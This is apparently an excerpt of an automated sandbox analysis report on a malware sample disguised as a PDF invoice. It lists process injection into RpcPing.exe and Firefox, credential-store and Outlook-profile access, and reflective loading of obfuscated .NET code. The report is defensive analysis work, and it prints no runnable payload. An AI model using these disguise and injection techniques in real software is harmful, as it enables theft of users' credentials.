Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe"
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
Source: C:\Windows\SysWOW64\RpcPing.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: credui.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\RpcPing.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: Hx.pdbSHA256 source: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fFUkGixTNm.exe, 00000007.00000002.2930068881.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp, fFUkGixTNm.exe, 00000009.00000002.2929589735.0000000000B3E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdbGCTL source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, RpcPing.exe, 00000008.00000003.2247703529.000000000382F000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000003.2245830854.0000000003672000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: RPCPing.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000003.00000002.2240436537.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, fFUkGixTNm.exe, 00000007.00000002.2930259689.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Hx.pdb source: ORIGINAL INVOICE COAU7230734298.pdf.exe

Data Obfuscation

Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.3682450.2.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.cs .Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.cs .Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.cs .Net Code: MLL574kV9S System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.6b70000.4.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.366a230.1.raw.unpack, MainForm.cs .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 8.2.RpcPing.exe.40bcd14.2.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 9.2.fFUkGixTNm.exe.343cd14.1.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 9.0.fFUkGixTNm.exe.343cd14.1.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 10.2.firefox.exe.31d5cd14.0.raw.unpack, frmListContacts.cs .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe Static PE information: 0xAFFFFCB7 [Fri Jul 27 19:12:55 2063 UTC]
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 0_2_070E9DED push FFFFFF8Bh; iretd 0_2_070E9DEF
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_0040D0CA push edi; ret 3_2_0040D0CC
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00416166 pushfd ; iretd 3_2_004161E5
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00417984 push esp; iretd 3_2_0041798A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413B46 push eax; iretd 3_2_00413B71
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413B62 push eax; iretd 3_2_00413B71
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00408307 push ds; iretd 3_2_00408309
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00403330 push eax; ret 3_2_00403332
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00415C40 push ebx; ret 3_2_00415C6A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00415C43 push ebx; ret 3_2_00415C6A
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00404D23 push esi; retf 3_2_00404D24
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413E4A push edi; retf 3_2_00413E4B
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00413F1C push eax; ret 3_2_00413F26
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_00417FD0 push esp; ret 3_2_00417FD1
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_004187E8 push ebx; ret 3_2_004187E9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E225F pushad ; ret 3_2_019E27F9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E27FA pushad ; ret 3_2_019E27F9
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_01A109AD push ecx; mov dword ptr [esp], ecx 3_2_01A109B6
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E283D push eax; iretd 3_2_019E2858
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe Code function: 3_2_019E1368 push eax; iretd 3_2_019E1369
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FEB7E push ebx; ret 7_2_036FEBA5
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FEB7B push ebx; ret 7_2_036FEBA5
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F1242 push ds; iretd 7_2_036F1244
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036F6005 push edi; ret 7_2_036F6007
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_036FF0A1 pushfd ; iretd 7_2_036FF120
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_037008BF push esp; iretd 7_2_037008C5
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_03701723 push ebx; ret 7_2_03701724
Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exe Code function: 7_2_03700F0B push esp; ret